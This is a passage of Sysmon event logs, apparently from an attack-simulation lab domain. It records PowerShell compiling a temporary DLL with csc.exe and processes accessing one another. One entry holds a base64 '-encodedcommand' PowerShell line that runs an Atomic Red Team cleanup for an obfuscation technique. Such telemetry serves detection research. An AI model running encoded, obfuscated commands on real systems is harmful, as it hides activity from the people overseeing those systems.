C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-00107B940A00}","TargetProcessId":"2272","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5510,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:47.703\r\nProcessGuid: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nProcessId: 3088\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\x31htb3z\\x31htb3z.dll\r\nCreationUtcTime: 2020-08-01 05:52:47.703","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:47.703","ProcessGuid":"{A837DB8D-032F-5F25-0000-0010BE790A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\x31htb3z\\x31htb3z.dll","CreationUtcTime":"2020-08-01 05:52:47.703","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5511,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nProcessGuid: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nProcessId: 3088\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\x31htb3z\\x31htb3z.cmdline\r\nCreationUtcTime: 2020-08-01 05:52:47.703","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","ProcessGuid":"{A837DB8D-032F-5F25-0000-0010BE790A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\x31htb3z\\x31htb3z.cmdline","CreationUtcTime":"2020-08-01 05:52:47.703","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5512,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.716\r\nProcessGuid: {A837DB8D-032F-5F25-0000-00108C970A00}\r\nProcessId: 2856\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\x31htb3z\\x31htb3z.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nParentProcessId: 3088\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.716","ProcessGuid":"{A837DB8D-032F-5F25-0000-00108C970A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\x31htb3z\\x31htb3z.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{A837DB8D-032F-5F25-0000-0010BE790A00}","ParentProcessId":"3088","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5513,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nSourceProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-00108C970A00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+8840(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+8840(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e5824c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","SourceProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","SourceProcessId":"3088","SourceThreadId":"4876","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-00108C970A00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+8840(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+8840(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e5824c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5514,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-00108C970A00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-00108C970A00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5515,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5516,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5517,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 